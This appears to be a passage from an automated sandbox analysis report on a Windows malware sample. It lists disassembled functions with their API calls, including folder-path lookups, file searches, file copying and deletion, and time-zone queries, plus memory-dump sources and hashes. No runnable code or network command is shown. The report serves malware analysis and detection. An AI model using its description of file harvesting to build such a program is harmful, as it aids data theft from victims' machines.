                                                                                    • Part of subcall function 00414910: FindClose.KERNEL32(000000FF), ref: 00414B92
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2965871519.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                                                                                  • String ID:
                                                                                  • API String ID: 2667927680-0
                                                                                  • Opcode ID: 2865ce5e19fc320e7bdf7344607122c15ce296a35d2d737d06258ac16b0412a0
                                                                                  • Instruction ID: b2f553c39a7574946245b6cc91baeb706efbd34a5fe7bafabb54328a91102e52
                                                                                  • Opcode Fuzzy Hash: 2865ce5e19fc320e7bdf7344607122c15ce296a35d2d737d06258ac16b0412a0
                                                                                  • Instruction Fuzzy Hash: FA213DBAA402047BC714FBF0EC46FED333DAB55300F40455DB649920C1EE7896C88B96
                                                                                  Function 004187C0 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 64memoryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00420E28,00000000,?), ref: 0041882F
                                                                                  • HeapAlloc.KERNEL32(00000000,?,?,?,?,00420E28,00000000,?), ref: 00418836
                                                                                  • wsprintfA.USER32 ref: 00418850
                                                                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2965871519.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Heap$AllocProcesslstrcpywsprintf
                                                                                  • String ID: %dx%d
                                                                                  • API String ID: 2716131235-2206825331
                                                                                  • Opcode ID: 124e357ede7c9a4ec2e38b5c0962ba134007384ad5c1c3eeb759acb43c381339
                                                                                  • Instruction ID: e741bf7ca2fc1d65a497d39fe48fe123552d5275a0b8a8093fc8d321cf3eb0b5
                                                                                  • Opcode Fuzzy Hash: 124e357ede7c9a4ec2e38b5c0962ba134007384ad5c1c3eeb759acb43c381339
                                                                                  • Instruction Fuzzy Hash: 48217FB5A80208BFDB00DFD4DD49FAEBBB9FB49B00F104119F605A7280C779A900CBA5
                                                                                  Function 00B11A07 Relevance: 6.1, APIs: 4, Instructions: 53stringCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2967063602.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_b00000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ExitProcessstrtok_s
                                                                                  • String ID:
                                                                                  • API String ID: 3407564107-0
                                                                                  • Opcode ID: 23663e118dc1d9675e857bc575fa0cf4eec126624f33d54e6aec62cd9d365414
                                                                                  • Instruction ID: 4e108242dfbc23b7f2453ceda49a85bc1f137fab845178d1804ed800bd8b26d0
                                                                                  • Opcode Fuzzy Hash: 23663e118dc1d9675e857bc575fa0cf4eec126624f33d54e6aec62cd9d365414
                                                                                  • Instruction Fuzzy Hash: 0D116DB4911209EFCB04EFE4D948AEDBBB9FF04305F5084A9E90567250E7306B44CF95
                                                                                  Function 00417980 Relevance: 6.1, APIs: 4, Instructions: 51memorytimeCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00420E00,00000000,?), ref: 004179B0
                                                                                  • HeapAlloc.KERNEL32(00000000,?,?,?,?,00420E00,00000000,?), ref: 004179B7
                                                                                  • GetLocalTime.KERNEL32(?,?,?,?,?,00420E00,00000000,?), ref: 004179C4
                                                                                  • wsprintfA.USER32 ref: 004179F3
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2965871519.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Heap$AllocLocalProcessTimewsprintf
                                                                                  • String ID:
                                                                                  • API String ID: 1243822799-0
                                                                                  • Opcode ID: d25a51ab8cf6fccfa60616151632c2f03c452b8beb60607c736287f9abe72aa2
                                                                                  • Instruction ID: 87643aaeb61937c0b28f46190d625ee9f9fa63f6271d25fb840393839df263de
                                                                                  • Opcode Fuzzy Hash: d25a51ab8cf6fccfa60616151632c2f03c452b8beb60607c736287f9abe72aa2
                                                                                  • Instruction Fuzzy Hash: 6D1139B2944118ABCB14DFC9DD45BBEB7F9FB4DB11F10421AF605A2280E3395940CBB5
                                                                                  Function 00B17BE7 Relevance: 6.1, APIs: 4, Instructions: 51memorytimeCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00420E00,00000000,?), ref: 00B17C17
                                                                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00B17C1E
                                                                                  • GetLocalTime.KERNEL32(?,?,?,?,?,00420E00,00000000,?), ref: 00B17C2B
                                                                                  • wsprintfA.USER32 ref: 00B17C5A
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2967063602.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_b00000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Heap$AllocateLocalProcessTimewsprintf
                                                                                  • String ID:
                                                                                  • API String ID: 377395780-0
                                                                                  • Opcode ID: d25a51ab8cf6fccfa60616151632c2f03c452b8beb60607c736287f9abe72aa2
                                                                                  • Instruction ID: 4eb07865b04ca32aa09af3fd9851fcf224be196cf2300112b206bec34f8e7371
                                                                                  • Opcode Fuzzy Hash: d25a51ab8cf6fccfa60616151632c2f03c452b8beb60607c736287f9abe72aa2
                                                                                  • Instruction Fuzzy Hash: 4C1127B2944118ABCB14DFC9DD45BBEB7F9FB4DB11F10425AF605A2280D6395940CBB1
                                                                                  Function 00B17C97 Relevance: 6.0, APIs: 4, Instructions: 49memorytimeCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,0064A248,00000000,?,00420E10,00000000,?,00000000,00000000), ref: 00B17CCA
                                                                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00B17CD1
                                                                                  • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,0064A248,00000000,?,00420E10,00000000,?,00000000,00000000,?), ref: 00B17CE4
                                                                                  • wsprintfA.USER32 ref: 00B17D1E
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2967063602.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_b00000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                                                                                  • String ID:
                                                                                  • API String ID: 3317088062-0
                                                                                  • Opcode ID: b881c6b0ead1d296197200307cca27ecd4ed8ab0e7bcc50e28ea7705d7869b14
                                                                                  • Instruction ID: 857e87a84c0f4f728c9a58693c3e730f8ae189b4e71e2b29550c89fc6b420ef4
                                                                                  • Opcode Fuzzy Hash: b881c6b0ead1d296197200307cca27ecd4ed8ab0e7bcc50e28ea7705d7869b14
                                                                                  • Instruction Fuzzy Hash: 69115EB1A85218EFEB208B54DC49FA9B7B8FB05721F1043EAE51AA32C0C7745980CF51
                                                                                  Function 00B13880 Relevance: 6.0, APIs: 4, Instructions: 45stringCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2967063602.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_b00000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: strtok_s
                                                                                  • String ID:
                                                                                  • API String ID: 3330995566-0
                                                                                  • Opcode ID: 88ee3256d646c21cc813880afdb35c02c7abfa0159f377c054558803c8e079b0
                                                                                  • Instruction ID: 277c88d27f528d561b9e86ae280ca53a4f5cced008fa49e86d96c64ef9561878
                                                                                  • Opcode Fuzzy Hash: 88ee3256d646c21cc813880afdb35c02c7abfa0159f377c054558803c8e079b0
                                                                                  • Instruction Fuzzy Hash: 1511F5B4E00209EFDB14CFE6D988AEEB7F5FB08B05F50C029E025A6254E7B49641CF55
                                                                                  Function 00B19547 Relevance: 6.0, APIs: 4, Instructions: 39fileCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • CreateFileA.KERNEL32(00B13D55,80000000,00000003,00000000,00000003,00000080,00000000,?,00B13D55,?), ref: 00B19563
                                                                                  • GetFileSizeEx.KERNEL32(000000FF,00B13D55), ref: 00B19580
                                                                                  • CloseHandle.KERNEL32(000000FF), ref: 00B1958E
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2967063602.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_b00000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: File$CloseCreateHandleSize
                                                                                  • String ID:
                                                                                  • API String ID: 1378416451-0
                                                                                  • Opcode ID: f462b5cb5e9955b16ef4a6797186c4cfbf9f6fe3abbcd1d27cc58421f490090d
                                                                                  • Instruction ID: 7ff8145c02d1d8d145dd1bb9925acd624beb5ddbb5b7419f403ffab7a2ed46c3
                                                                                  • Opcode Fuzzy Hash: f462b5cb5e9955b16ef4a6797186c4cfbf9f6fe3abbcd1d27cc58421f490090d
                                                                                  • Instruction Fuzzy Hash: 77F06939E40208BBDB24DFA0DC59B9A77BAEB59310F508294AA11A7280D63596418B40
                                                                                  Function 00B16D5A Relevance: 6.0, APIs: 4, Instructions: 30sleepCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,0064A540,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 00B16D31
                                                                                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00B16D4F
                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00B16D60
                                                                                  • Sleep.KERNEL32(00001770), ref: 00B16D6B
                                                                                  • CloseHandle.KERNEL32(?,00000000,?,0064A540,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 00B16D81
                                                                                  • ExitProcess.KERNEL32 ref: 00B16D89
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2967063602.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_b00000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                                                                                  • String ID:
                                                                                  • API String ID: 941982115-0
                                                                                  • Opcode ID: 5d3735d569cffe7bbea000e7acfc03b16a2d4300877d619867e3aa12521868c8
                                                                                  • Instruction ID: 888a70a5b36087e846cbb65c598b5dda120e191d5e7539b63c2a6e90e39ad1ef
                                                                                  • Opcode Fuzzy Hash: 5d3735d569cffe7bbea000e7acfc03b16a2d4300877d619867e3aa12521868c8
                                                                                  • Instruction Fuzzy Hash: EAF0BE78A40605AEE710ABE0EC0ABFD33B5EF05305FA006B8F112A1190CBB05580CA56
                                                                                  Function 00406D40 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 157COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2965871519.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: `o@
                                                                                  • API String ID: 0-590292170
                                                                                  • Opcode ID: 7ad59576bd09cc7eceacd48e5d7f84764234e902501c4ca3efc067249123903a
                                                                                  • Instruction ID: c65cc5113f4fbf7636557f8b1f026e9f2285814709fd8c8344c4410f81c0aea8
                                                                                  • Opcode Fuzzy Hash: 7ad59576bd09cc7eceacd48e5d7f84764234e902501c4ca3efc067249123903a
                                                                                  • Instruction Fuzzy Hash: A66138B4900219EFCB14DF94E944BEEB7B1BB04304F1185AAE40A77380D739AEA4DF95
                                                                                  Function 00414BB0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 118stringCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 00418DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418E0B
                                                                                  • lstrcatA.KERNEL32(?,00000000,?,00000104), ref: 00414BEA
                                                                                  • lstrcatA.KERNEL32(?,0090A270), ref: 00414C08
                                                                                    • Part of subcall function 00414910: wsprintfA.USER32 ref: 0041492C
                                                                                    • Part of subcall function 00414910: FindFirstFileA.KERNEL32(?,?), ref: 00414943
                                                                                    • Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,00420FDC), ref: 00414971
                                                                                    • Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,00420FE0), ref: 00414987
                                                                                    • Part of subcall function 00414910: FindNextFileA.KERNEL32(000000FF,?), ref: 00414B7D
                                                                                    • Part of subcall function 00414910: FindClose.KERNEL32(000000FF), ref: 00414B92
                                                                                    • Part of subcall function 00414910: wsprintfA.USER32 ref: 004149B0
                                                                                    • Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,004208D2), ref: 004149C5
                                                                                    • Part of subcall function 00414910: wsprintfA.USER32 ref: 004149E2
                                                                                    • Part of subcall function 00414910: PathMatchSpecA.SHLWAPI(?,?), ref: 00414A1E
                                                                                    • Part of subcall function 00414910: lstrcatA.KERNEL32(?,00906250,?,000003E8), ref: 00414A4A
                                                                                    • Part of subcall function 00414910: lstrcatA.KERNEL32(?,00420FF8), ref: 00414A5C
                                                                                    • Part of subcall function 00414910: lstrcatA.KERNEL32(?,?), ref: 00414A70
                                                                                    • Part of subcall function 00414910: lstrcatA.KERNEL32(?,00420FFC), ref: 00414A82
                                                                                    • Part of subcall function 00414910: lstrcatA.KERNEL32(?,?), ref: 00414A96
                                                                                    • Part of subcall function 00414910: CopyFileA.KERNEL32(?,?,00000001), ref: 00414AAC
                                                                                    • Part of subcall function 00414910: DeleteFileA.KERNEL32(?), ref: 00414B31
                                                                                    • Part of subcall function 00414910: wsprintfA.USER32 ref: 00414A07
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2965871519.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: lstrcat$Filewsprintf$Find$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                                                                  • String ID: UaA
                                                                                  • API String ID: 2104210347-3893042857
                                                                                  • Opcode ID: 8ba6efb70901ca5478d437239848c433a21302fddde02a53de9488f6e8c4bcee
                                                                                  • Instruction ID: 5a37e5a53a2562059c730f6b0b3ae842953eee94398a2728108a858f2c1bafc2
                                                                                  • Opcode Fuzzy Hash: 8ba6efb70901ca5478d437239848c433a21302fddde02a53de9488f6e8c4bcee
                                                                                  • Instruction Fuzzy Hash: 9341C5BA6001047BD754FBB0EC42EEE337DA785700F40851DB54A96186EE795BC88BA6
                                                                                  Function 00418B60 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60timeCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                                                  • GetSystemTime.KERNEL32(?,008D4F10,004205AE,?,?,?,?,?,?,?,?,?,00404963,?,00000014), ref: 00418B86
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2965871519.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: SystemTimelstrcpy
                                                                                  • String ID: cI@$cI@
                                                                                  • API String ID: 62757014-1697673767
                                                                                  • Opcode ID: 728e3afec194442a0a20c9b4cf47b2a0a0f7365ad80767aaeb7a96b2b5f46ac6
                                                                                  • Instruction ID: 15f3dfc6f8d56a301bf8b2a7a9260479b6db203ca669f730be279af5ebf73ee3
                                                                                  • Opcode Fuzzy Hash: 728e3afec194442a0a20c9b4cf47b2a0a0f7365ad80767aaeb7a96b2b5f46ac6
                                                                                  • Instruction Fuzzy Hash: 7111E971D00008AFCB04EFA9C8919EE77B9EF58314F04C05EF01667241DF38AA86CBA6
                                                                                  Function 00415050 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 48stringCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 00418DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418E0B
                                                                                  • lstrcatA.KERNEL32(?,00000000,?,00000104), ref: 0041508A
                                                                                  • lstrcatA.KERNEL32(?,00909950), ref: 004150A8
                                                                                    • Part of subcall function 00414910: wsprintfA.USER32 ref: 0041492C
                                                                                    • Part of subcall function 00414910: FindFirstFileA.KERNEL32(?,?), ref: 00414943
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2965871519.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: lstrcat$FileFindFirstFolderPathwsprintf
                                                                                  • String ID: aA
                                                                                  • API String ID: 2699682494-2567749500
                                                                                  • Opcode ID: d64dcdbc5a5b078ecf4a674937750308087945107cc9d2085dbcd85f67f2e6ce
                                                                                  • Instruction ID: 27646669aa04729862e240b26620d37997e147c17b59a732ce93ef494e7ce50b
                                                                                  • Opcode Fuzzy Hash: d64dcdbc5a5b078ecf4a674937750308087945107cc9d2085dbcd85f67f2e6ce
                                                                                  • Instruction Fuzzy Hash: B801D6BAA4020877C714FBB0DC42EEE333CAB55304F00415DB68A570D1EE789AC88BA6
                                                                                  Function 00B0BCE7 Relevance: 5.3, APIs: 4, Instructions: 284stringCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 00B1A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 00B1A9EF
                                                                                    • Part of subcall function 00B1AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 00B1AC2C
                                                                                    • Part of subcall function 00B1AC17: lstrcpy.KERNEL32(00000000), ref: 00B1AC6B
                                                                                    • Part of subcall function 00B1AC17: lstrcat.KERNEL32(00000000,00000000), ref: 00B1AC79
                                                                                    • Part of subcall function 00B1AB87: lstrcpy.KERNEL32(00000000,?), ref: 00B1ABD9
                                                                                    • Part of subcall function 00B1AB87: lstrcat.KERNEL32(00000000), ref: 00B1ABE9
                                                                                    • Part of subcall function 00B1AB07: lstrcpy.KERNEL32(?,00420E17), ref: 00B1AB6C
                                                                                    • Part of subcall function 00B1AA07: lstrcpy.KERNEL32(?,00000000), ref: 00B1AA4D
                                                                                    • Part of subcall function 00B0A077: memcmp.MSVCRT(?,00421264,00000003), ref: 00B0A094
                                                                                  • lstrlen.KERNEL32(00000000), ref: 00B0BF06
                                                                                    • Part of subcall function 00B19097: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00B190B9
                                                                                  • StrStrA.SHLWAPI(00000000,004213E0), ref: 00B0BF34
                                                                                  • lstrlen.KERNEL32(00000000), ref: 00B0C00C
                                                                                  • lstrlen.KERNEL32(00000000), ref: 00B0C020
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2967063602.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_b00000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: lstrcpy$lstrlen$lstrcat$AllocLocalmemcmp
                                                                                  • String ID:
                                                                                  • API String ID: 1440504306-0
                                                                                  • Opcode ID: 9e08ee45ebc43fe706c0c8ad989736c962bf943befa7584f1b5ac42d019a3d06
                                                                                  • Instruction ID: 1821b76d693b4857f8bc28b16406689815708645c6002bc412998296db7b15e6
                                                                                  • Opcode Fuzzy Hash: 9e08ee45ebc43fe706c0c8ad989736c962bf943befa7584f1b5ac42d019a3d06
                                                                                  • Instruction Fuzzy Hash: 2DB13271911208ABCB18FBA0DD96EEE77B9AF54300F904199F50662091EF347F88CF62
                                                                                  Function 00413BDB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16filestringCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • lstrcatA.KERNEL32(?,?,?,00000104,?,00000104), ref: 00413935
                                                                                  • StrCmpCA.SHLWAPI(?,00420F70), ref: 00413947
                                                                                  • StrCmpCA.SHLWAPI(?,00420F74), ref: 0041395D
                                                                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00413C67
                                                                                  • FindClose.KERNEL32(000000FF), ref: 00413C7C
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2965871519.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Find$CloseFileNextlstrcat
                                                                                  • String ID: !=A
                                                                                  • API String ID: 3840410801-2919091325
                                                                                  • Opcode ID: 28feb7c8be81de4ab4b55bfcc7f9479259f5a9bafbd7cecf7f5c2433705f41d5
                                                                                  • Instruction ID: 20ec2b31cb4d991c835852fde49fc2354676703d0d5a57c203257a76fc367b8d
                                                                                  • Opcode Fuzzy Hash: 28feb7c8be81de4ab4b55bfcc7f9479259f5a9bafbd7cecf7f5c2433705f41d5
                                                                                  • Instruction Fuzzy Hash: FCD012756401096BCB20EF90DD589EA7779DB55305F0041C9B40EA6150EB399B818B95
                                                                                  Function 00B151A7 Relevance: 5.1, APIs: 4, Instructions: 70stringCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 00B19047: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00B19072
                                                                                  • lstrcat.KERNEL32(?,00000000), ref: 00B151E1
                                                                                  • lstrcat.KERNEL32(?,00421070), ref: 00B151FE
                                                                                  • lstrcat.KERNEL32(?,0064A5F8), ref: 00B15212
                                                                                  • lstrcat.KERNEL32(?,00421074), ref: 00B15224
                                                                                    • Part of subcall function 00B14B77: wsprintfA.USER32 ref: 00B14B93
                                                                                    • Part of subcall function 00B14B77: FindFirstFileA.KERNEL32(?,?), ref: 00B14BAA
                                                                                    • Part of subcall function 00B14B77: StrCmpCA.SHLWAPI(?,00420FDC), ref: 00B14BD8
                                                                                    • Part of subcall function 00B14B77: StrCmpCA.SHLWAPI(?,00420FE0), ref: 00B14BEE
                                                                                    • Part of subcall function 00B14B77: FindNextFileA.KERNEL32(000000FF,?), ref: 00B14DE4
                                                                                    • Part of subcall function 00B14B77: FindClose.KERNEL32(000000FF), ref: 00B14DF9
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2967063602.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_b00000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
